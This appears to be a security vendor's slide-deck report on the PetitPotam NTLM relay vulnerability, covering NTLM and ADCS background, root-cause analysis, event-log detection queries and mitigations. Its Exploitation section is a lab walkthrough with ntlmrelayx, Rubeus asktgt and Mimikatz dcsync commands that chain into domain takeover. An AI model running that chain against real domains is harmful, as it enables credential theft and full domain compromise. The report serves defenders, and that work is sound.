PetitPotam Vulnerability Analysis Report

marketing302922 1 views 30 slides Oct 06, 2025

About This Presentation

Today, with constantly changing and developing cyber threats, ensuring the security of systems necessitates regularly following up on current vulnerabilities and taking swift action. Therefore, analysis of detected vulnerabilities and taking the necessary security measures to prevent possible attacks is cr...


Slide Content

PetitPotam Vulnerability Analysis
Author: Threat Intelligence Team
Release Date: 02.11.2021
Report ID: BD02112102

Table of Contents

Introduction 4
Vulnerability Analysis 7
Detection Phase 14
Exploitation 18
Mitigation and Measures 25
Conclusion 30

Introduction

Today, with constantly changing and developing cyber threats, ensuring the security of systems necessitates regularly following up on current vulnerabilities and taking swift action. Therefore, analysing detected vulnerabilities and taking the necessary security measures to prevent possible attacks is critical.

The PetitPotam vulnerability, which is the subject of this report, is analysed below together with the necessary measures against it.

What is NTLM?

NTLM (New Technology LAN Manager) is a protocol presented by Microsoft to authenticate users and protect the integrity and privacy of their activities. NTLM performs the authentication process with a three-way handshake that works on a "challenge-response" basis. Today, NTLM in Windows systems has largely given way to the Kerberos protocol, a similar authentication protocol, but NTLM is still supported for some scenarios.

The following steps are applied to create an NTLM hash value. First, the user password is converted to little-endian UTF-16 format, and then its MD4 hash value is computed. Finally, this value is stored in the SAM file.

How NTLM Works?

NTLM performs the user identity verification process with the challenge-response mechanism in the following steps:

1. The user accesses a client and shares the username, password and domain information with the client.
2. The client creates a hashed version of the password and discards the plaintext password.
3. The client forwards the username to the corresponding server as plaintext.
4. The server produces a 16-byte random number named the challenge (or nonce) and sends this number to the client.
5. The client encrypts the received challenge value with the hash value of the user password and sends it to the server. This is called the response.
6. The server sends the username, challenge and response values to the DC (a Domain Controller is a server that responds to authentication requests and verifies users on computer networks).
7. The DC retrieves the hash value of the user password from the SAM (Security Access Manager) database using the username. This hash value is used to encrypt the challenge value.
8. The DC compares the encrypted challenge value from step 7 with the response value produced by the client in step 5. If they match, the authentication is completed.

NTLM Relay Attack

In an NTLM relay attack, the cyber threat actor takes up a position between the client and the server on the network and thereby controls the authentication traffic. First, the client's authentication requests are forwarded by the cyber threat actor to the server. Next, the cyber threat actor completes the authentication process against the server with the forwarded request, and can thus authenticate using the client's credentials. During these stages the client believes it is connected to the server it wanted to connect to, and the server believes it is authenticating a legitimate client.

Against a system without defenses for NTLM relay attacks, the attack can lead to remote code execution on the device, and when the relayed credentials belong to critical systems (such as domain controller servers) it can be used for lateral movement.
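A simplified model of the eight steps and the relay described above, added here as an example (not code from the report): an HMAC-MD5 over the challenge stands in for the NTLM response computation, the NT hash and host names are constructed values, and mixing the target service name into the response is a simplified stand-in for Extended Protection / channel binding, not the real NTLM wire format. It shows why a plain challenge-response relays cleanly and why binding the response to the intended service breaks the relay.

```python
import hashlib
import hmac
import os

# Constructed demo values, not real credentials: the user's NT hash as the DC would
# hold it in the SAM (see "What is NTLM?"), and assumed service names for the hosts.
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
REAL_SERVER = "cifs/fileserver.lab.local"
ATTACKER_HOST = "cifs/relay.lab.local"


def make_challenge() -> bytes:
    """Step 4: the server produces a random 16-byte challenge (nonce)."""
    return os.urandom(16)


def client_response(nt_hash: bytes, challenge: bytes, target: str, bound: bool) -> bytes:
    """Step 5: the client proves knowledge of the NT hash with an HMAC-MD5 over the
    challenge (NTLMv2 style). With bound=True the name of the service the client
    believes it is talking to is mixed in: a simplified stand-in for EPA/channel binding."""
    data = challenge + (target.encode("utf-16-le") if bound else b"")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def dc_verify(stored_hash: bytes, challenge: bytes, resp: bytes, service: str, bound: bool) -> bool:
    """Steps 7-8: the DC recomputes the response from the stored hash and compares it.
    `service` is the server that actually received the response."""
    expected = client_response(stored_hash, challenge, service, bound)
    return hmac.compare_digest(expected, resp)


def direct_logon(bound: bool) -> bool:
    """Legitimate logon straight to the real server; succeeds in both modes."""
    challenge = make_challenge()
    resp = client_response(NT_HASH, challenge, REAL_SERVER, bound)
    return dc_verify(NT_HASH, challenge, resp, REAL_SERVER, bound)


def relayed_logon(bound: bool) -> bool:
    """The relay on the slide: the threat actor sits between client and server, passes the
    real server's challenge to the client and the client's response back to the server.
    The client thinks it is authenticating to ATTACKER_HOST. Returns True if accepted."""
    challenge = make_challenge()                                       # real server -> relay
    resp = client_response(NT_HASH, challenge, ATTACKER_HOST, bound)   # client -> relay
    return dc_verify(NT_HASH, challenge, resp, REAL_SERVER, bound)     # relay -> server -> DC


if __name__ == "__main__":
    print("direct, plain:", direct_logon(False), " relayed, plain:", relayed_logon(False))
    print("direct, bound:", direct_logon(True), " relayed, bound:", relayed_logon(True))
```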

Encrypting File System Remote Protocol (EFSRPC)

EFSRPC (Encrypting File System Remote Protocol) is the protocol used to perform maintenance and management operations, from a remote location, on encrypted data accessed over a network. Windows uses it to provide remote management of files encrypted with EFS (Encrypting File System).

EFSRPC does not address how data is encrypted, how encrypted data is stored, or how it is read, written, created and deleted. In Windows, NTFS is the storage mechanism, and the SMB (Server Message Block) protocol provides remote access to such files.

SMB Protocol

The SMB (Server Message Block) protocol is a client-server communication protocol used for file sharing on a network. It allows applications to read and write files and to request various services from server programs on the computer network. For example, using the SMB protocol, an application can access files, printers, serial ports and other resources on a network. Thus, files on a remote server can be read and updated, and new files can be created. It is also possible to contact any server program that is set up to receive SMB client requests.

Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is a platform developed by Microsoft that provides customizable services for issuing and managing the digital certificates used in software security systems based on public key technologies. The digital certificates generated by ADCS can be used to encrypt and digitally sign electronic documents and messages. These digital certificates can also be used for authentication of computer, user or device accounts on a network. A corporation that does not use ADCS must use third-party platforms to perform the operations provided by ADCS.

ADCS supports S/MIME (Secure/Multipurpose Internet Mail Extensions), secure wireless networks, Virtual Private Networks (VPN), Internet Protocol Security (IPsec), Encrypting File System (EFS), smart card logon, SSL/TLS and many more applications and services.

ADCS consists of six different components:

Certification Authority (CA): used to issue certificates to users, computers and services and to manage certificate validity. Two options are available: root or subordinate.

Web Enrollment: allows users to connect to the CA through a web interface. Thus, users can request a certificate and retrieve certificate revocation lists (CRL).

Online Responder: responds to requests regarding the status of requested certificates. After decoding the certificate's status and evaluating its position, it sends a signed response with the status information.

Network Device Enrollment Service: allows network devices without a domain account to obtain a certificate.

Certificate Enrollment Policy Web Service: used by users and computers to retrieve certificate enrollment policy information.

Certificate Enrollment Web Service: allows users and computers to perform certificate enrollment using the HTTPS protocol.

Vulnerability Analysis

PetitPotam Vulnerability

PetitPotam is a vulnerability that affects Windows domain controllers (Domain Controller) or servers and is known as an NTLM relay attack. Cyber threat actors seize NTLM authentication hash information, allowing them to complete authentication processes on the target device.

The PetitPotam weakness is due to abuse of the MS-EFSRPC (Encrypting File System Remote Protocol) protocol, which allows Windows devices to perform operations on encrypted data stored on remote systems. The EfsRpcOpenFileRaw function used by the MS-EFSRPC protocol is what causes the weakness. PetitPotam can be triggered by a cyber threat actor connecting to the MS-EFSRPC interface of the remote system by sending an SMB request. Thus, the target computer is made to start an authentication process and share authentication details through NTLM.

The PetitPotam vulnerability, which enables a man-in-the-middle attack, allows a domain controller to be made to perform NTLM authentication using the MS-EFSRPC protocol. This process is carried out via LSARPC (Local Security Authority Remote Protocol). By forcing the target computer to perform an authentication process and share password hashes via NTLM, Windows ADCS can be exploited and certificate information can be captured. With the received certificate information, a TGT ticket can be requested on behalf of the target device by impersonating it. In this way, all domain controllers can be taken over without any authentication.

Technical Analysis

When the EfsRpcOpenFileRaw request made by PetitPotam is processed by the server, the EfsRpcOpenFileRaw_Downlevel function in efslsaext.dll handles it. Most of the code of this function is contained in an impersonation block between the RpcImpersonateClient call and the RpcRevertToSelf call. The code inside this block is executed with the identity of the party who sent the request (the cyber threat actor), while the code outside the block is executed with the identity of the server process itself.

At the beginning of EfsRpcOpenFileRaw_Downlevel, outside the impersonation block, there is a call to the EfsGetLocalFileName function, which tries to open the UNC path provided by the cyber threat actor. This process causes NTLM credentials to be sent in SMB requests. The relevant parts of the EfsRpcOpenFileRaw_Downlevel function are as follows:

Figure 1 EfsGetLocalFileName is called at the beginning of the EfsRpcOpenFileRaw_Downlevel function, outside the impersonation block

The call shown by the red arrow above causes NTLM credentials to be leaked. This call is carried out with the authority of the computer account instead of the authority of the user who sends the request. The impersonation block starts at the part shown with the orange arrow.

Figure 2 Continuation of the EfsRpcOpenFileRaw_Downlevel function

While the other calls sent to the EFSRPC protocol are executed with the identity of the requesting user, only the call to the EfsGetLocalFileName function is not carried out with the identity of the requesting user. This means that an anonymous or unprivileged user cannot remotely operate the other EFSRPC functions, such as reading or creating arbitrary network files.
Detection Phase

Systems Affected by PetitPotam Vulnerability

Windows Server 2008, Windows Server 2008 R2 and Windows Server 2022 versions are found to be affected.

PetitPotam takes advantage of servers on which the protections against NTLM relay attacks on ADCS are not configured.

The use of Active Directory Certificate Services (ADCS) with any of the following services indicates potential vulnerability to PetitPotam:

• Certificate Authority Web Enrollment
• Certificate Enrollment Web Service

Detecting the PetitPotam Vulnerability

Method-1

If a DC certificate can be obtained, a TGT ticket can be taken. Thus, it is possible to obtain the NT hash information of service accounts using the DC computer account. This makes it possible to seize the entire domain. When the TGT request is sent, it is transmitted with the sender's IP address. When the DC account is used from a non-DC machine, the username is the username of the DC account, while the IP address does not belong to a DC.

The following steps can be applied to detect PetitPotam exploitation:

• Get a list of domain controllers
• Get the IP address list for the domain controllers
• Alert if a DC account has a TGT request from an IP address that is not within the DC IP list

For the above method there is a query template for Azure Sentinel. GitHub link for the template: https://github.com/Cyb3r-Monk/Threat-Hunting-and-Detection/tree/main/Credential%20Access

Method-2

Some methods were determined to detect the actions associated with the vulnerability in research on PetitPotam. It has been found that events with ANONYMOUS LOGON and connections with Event IDs 5145, 5140 and 4624 are related to PetitPotam. The following items help identify possible PetitPotam activity in the environment:

• Any anonymous connection, including anonymous connections to RPC
• Elevated user access without a source workstation. In most cases this can be refined by ignoring all non-specific source/client IP addresses.

windows_event_id=4624 AND user='ANONYMOUS LOGON' AND authentication_package='NTLM'

Figure 3 Detection Query

Investigation of PetitPotam Traces in File Share Event Logs

windows_event_id=4624 AND elevated=true AND package_name="NTLMV2" AND workstation_name is null

windows_event_id=5145 AND object_name LIKE '%IPC%' AND file_path in ('lsarpc','efsrpc','lsass','samr','netlogon') AND access_granted LIKE 'ReadData%WriteData%AddFile%'
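Both detection methods, Method-1 (DC account requesting a TGT from a non-DC address) and Method-2 (the three queries above), run over constructed sample events as an added example that is not from the report or from the linked Sentinel template. Field names mirror the slide's queries; the DC account and IP lists, the use of event 4768 for the TGT request (the slide does not name the event ID) and all sample values are assumptions.

```python
# Constructed sample events (not from a real environment). Field names follow the
# queries on the slides; 4768 (a Kerberos TGT was requested) is used for Method-1
# because the slide describes the TGT request but does not name its event ID.
DC_ACCOUNTS = {"DC01$", "DC02$"}       # assumed: domain controller computer accounts
DC_IPS = {"10.0.0.10", "10.0.0.11"}    # assumed: IP addresses of those DCs
SUSPICIOUS_PIPES = {"lsarpc", "efsrpc", "lsass", "samr", "netlogon"}

EVENTS = [
    {"windows_event_id": 4768, "user": "DC01$", "src_ip": "10.0.0.10"},
    {"windows_event_id": 4768, "user": "DC01$", "src_ip": "10.0.5.77"},
    {"windows_event_id": 4624, "user": "ANONYMOUS LOGON",
     "authentication_package": "NTLM", "src_ip": "10.0.5.77"},
    {"windows_event_id": 4624, "user": "svc_backup", "elevated": True,
     "package_name": "NTLMV2", "workstation_name": None},
    {"windows_event_id": 5145, "object_name": "\\\\*\\IPC$", "file_path": "efsrpc",
     "access_granted": "ReadData WriteData AddFile", "src_ip": "10.0.5.77"},
    {"windows_event_id": 5145, "object_name": "\\\\*\\IPC$", "file_path": "srvsvc",
     "access_granted": "ReadData", "src_ip": "10.0.0.5"},
]


def dc_tgt_from_non_dc_ip(ev):
    """Method-1: a DC computer account requests a TGT from an address that is not a DC."""
    return (ev["windows_event_id"] == 4768 and ev.get("user") in DC_ACCOUNTS
            and ev.get("src_ip") not in DC_IPS)


def anonymous_ntlm_logon(ev):
    """Method-2, first query: ANONYMOUS LOGON over NTLM."""
    return (ev["windows_event_id"] == 4624 and ev.get("user") == "ANONYMOUS LOGON"
            and ev.get("authentication_package") == "NTLM")


def elevated_ntlm_no_workstation(ev):
    """Method-2, second query: elevated NTLMv2 logon with no source workstation name."""
    return (ev["windows_event_id"] == 4624 and ev.get("elevated") is True
            and ev.get("package_name") == "NTLMV2" and ev.get("workstation_name") is None)


def ipc_pipe_access(ev):
    """Method-2, third query: IPC$ access to the EFSRPC/LSARPC-related named pipes
    with ReadData, WriteData and AddFile all granted."""
    granted = ev.get("access_granted", "")
    return (ev["windows_event_id"] == 5145 and "IPC$" in ev.get("object_name", "")
            and ev.get("file_path", "").lower() in SUSPICIOUS_PIPES
            and all(a in granted for a in ("ReadData", "WriteData", "AddFile")))


RULES = (dc_tgt_from_non_dc_ip, anonymous_ntlm_logon,
         elevated_ntlm_no_workstation, ipc_pipe_access)


def hunt(events):
    """Return (rule name, event index) pairs for every event that matches a rule."""
    return [(rule.__name__, i) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, idx in hunt(EVENTS):
        print(f"{name}: event {idx} {EVENTS[idx]}")
```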

17
Exploitation

18
PetitPotam Vulnerability Analysis
Exploitation
APOCtoolwaspublishedviaGitHubforPetitPotamvulnerability.Thistoolreveals
howacyber-threatactorexplimatestheMS-EFSRPCprotocolandreceivingNTLM
credentialsviaLSARPCtoauthenticateaserveronanotherserver.
POCToolGitHubLink:"https://github.com/topotam/petitpotam"
LabEnvironment
NtlmRelayxinstallation
NtlmRelayxisrequiredtodetectandcommunicatetheADCSserver.
Githublinki:“https://github.com/SecureAuthCorp/impacket”
gitclonehttps://github.com/ExAndroidDev/impacket.git
cdimpacket
gitcheckoutntlmrelayx-adcs-attack
sudopython3setup.pyinstall
Figure 4 Lab requirements

Certificate Authority Finding

"certutil.exe" can be used to find the ADCS server on Windows.

Figure 5 Windows Active Directory Certificate Service

ntlmrelayx Preparation

The authentication requests should be captured with ntlmrelayx on the Kali machine. Here the KerberosAuthentication template is used; the DomainController template can also be used.

sudo python3 ntlmrelayx.py -debug -smb2support --target http://pki.lab.local/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

Figure 6 ntlmrelayx Tool Usage

Forcing authentication

Using PetitPotam on Windows, the target is forced to perform NTLM authentication against the Kali machine.

TGT requesting

The Rubeus tool can be used to request a Kerberos TGT in Windows.

GitHub link: "https://github.com/GhostPac/Rubeus"

.\Rubeus.exe asktgt /outfile:kirbi /user:dc01$ /ptt /certificate:<base64-certificate>

Figure 7 Rubeus Tool Usage

The klist command can be used to confirm the TGT ticket.

Finally, NTLM hash values can be displayed via Mimikatz:

lsadump::dcsync /user:krbgt

Mitigation and Measures

Methods of protection from attacks against PetitPotam

Priority measures

It is recommended to disable NTLM authentication as the primary protection against PetitPotam attacks. For this, gpedit.msc should be started first. In the window that opens, under the "Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options" tab, the "Network Security: Restrict NTLM: NTLM authentication in this domain" option must be set.

Services that must allow NTLM authentication should be protected with Extended Protection for Authentication (EPA) or SMB signing. For this, from the Server Manager menu, EPA can be enabled for Certificate Authority Web Enrollment under the Tools > Internet Information Services (IIS) Manager tab.

With the activation of EPA, a Web.config file is created under the directory "<%windir%>\systemdata\CES\<CAName>_CES_Kerberos\web.config". In this file, the <extendedProtectionPolicy> element must be set to WhenSupported or Always.

The Require SSL option, which allows only HTTPS connections, must be enabled.

Figure 8 Security Policy Configuration
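An added example (not from the report) that audits a CES web.config for the two settings above: an <extendedProtectionPolicy> set to WhenSupported or Always, and Require SSL. The weak and hardened fragments are constructed; the XML layout around <extendedProtectionPolicy> and the IIS <access sslFlags> form used for Require SSL are assumptions about the file.

```python
import xml.etree.ElementTree as ET

# Constructed fragments in the shape of the CES web.config the slide refers to. The element
# layout around <extendedProtectionPolicy> and the IIS <access sslFlags> element used for
# Require SSL are assumptions, not copied from a real server.
WEAK_CONFIG = """<configuration>
  <system.serviceModel>
    <bindings><wsHttpBinding><binding name="CES_Kerberos">
      <security mode="Transport">
        <transport clientCredentialType="Windows">
          <extendedProtectionPolicy policyEnforcement="Never" />
        </transport>
      </security>
    </binding></wsHttpBinding></bindings>
  </system.serviceModel>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <system.serviceModel>
    <bindings><wsHttpBinding><binding name="CES_Kerberos">
      <security mode="Transport">
        <transport clientCredentialType="Windows">
          <extendedProtectionPolicy policyEnforcement="Always" />
        </transport>
      </security>
    </binding></wsHttpBinding></bindings>
  </system.serviceModel>
  <system.webServer><security><access sslFlags="Ssl" /></security></system.webServer>
</configuration>"""

ACCEPTED_EPA = {"WhenSupported", "Always"}


def audit_ces_config(xml_text: str) -> list:
    """Return a list of findings; an empty list means both checks from the slide pass."""
    root = ET.fromstring(xml_text)
    findings = []
    policies = list(root.iter("extendedProtectionPolicy"))
    if not policies:
        findings.append("no <extendedProtectionPolicy> element: EPA is not configured")
    for pol in policies:
        value = pol.get("policyEnforcement", "Never")  # missing attribute: no enforcement
        if value not in ACCEPTED_EPA:
            findings.append(f"policyEnforcement={value}: must be WhenSupported or Always")
    access = root.find(".//access")
    ssl_flags = access.get("sslFlags", "") if access is not None else ""
    if "Ssl" not in [f.strip() for f in ssl_flags.split(",")]:
        findings.append("Require SSL is not enforced (no access sslFlags containing Ssl)")
    return findings


if __name__ == "__main__":
    print(audit_ces_config(WEAK_CONFIG))
    print(audit_ces_config(HARDENED_CONFIG))
```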

Additional measures

Using the Group Policy "Network Security: Restrict NTLM: Incoming NTLM Traffic", deactivate NTLM on any ADCS server in the domain that uses NTLM traffic. For this purpose, under the Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options tab, the "Network Security: Restrict NTLM: Incoming NTLM Traffic" option must be set to "Deny all accounts" or "Deny all domain accounts".

Figure 9 SSL Policy Configuration

Figure 10 Additional Measures

Deactivate NTLM for Internet Information Services (IIS) on the ADCS servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services. For this purpose, from the Server Manager menu, under the Tools > Internet Information Services (IIS) Manager tab, right-click the Windows Authentication option and add "Negotiate:Kerberos" there.

Figure 11 Negotiate Kerberos

Current status on PetitPotam

A security update for the PetitPotam vulnerability was published by Microsoft with the August 2021 update. It was given the code CVE-2021-36942 and has a CVSS score of 7.5.

With PetitPotam, a cyber threat actor can call a function in the LSARPC interface and force the domain controller to authenticate to another server using NTLM. The published security update prevents the OpenEncryptedFileRawA and OpenEncryptedFileRawW calls among the affected API calls through the LSARPC interface.

Microsoft updated the EfsRpcOpenFileRaw_Downlevel function in efslsaext.dll in the update. The OpenEncryptedFileRaw function now checks a registry value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS. If this value exists and is equal to 1, OpenEncryptedFileRaw works as before. Problems may occur in backup systems if the published update is applied. Such systems can be made to work again by setting this parameter value, but they are then vulnerable to the PetitPotam vulnerability.

Figure 12 After Updating EfsRpcOpenFileRaw_Downlevel function


Conclusion

PetitPotam is a very critical vulnerability that affects Windows systems. In this report, issues such as what the PetitPotam vulnerability is, why it originates, what systems it affects, how it can be exploited, and the measures that can be taken against the vulnerability are discussed. It is important to implement the security updates released to avoid being affected by attacks targeting the PetitPotam vulnerability. If the update cannot be applied, taking the said precautions is very important for the safety of the systems.
BRANDEFENSE.COM
+90 (850) 303 85 35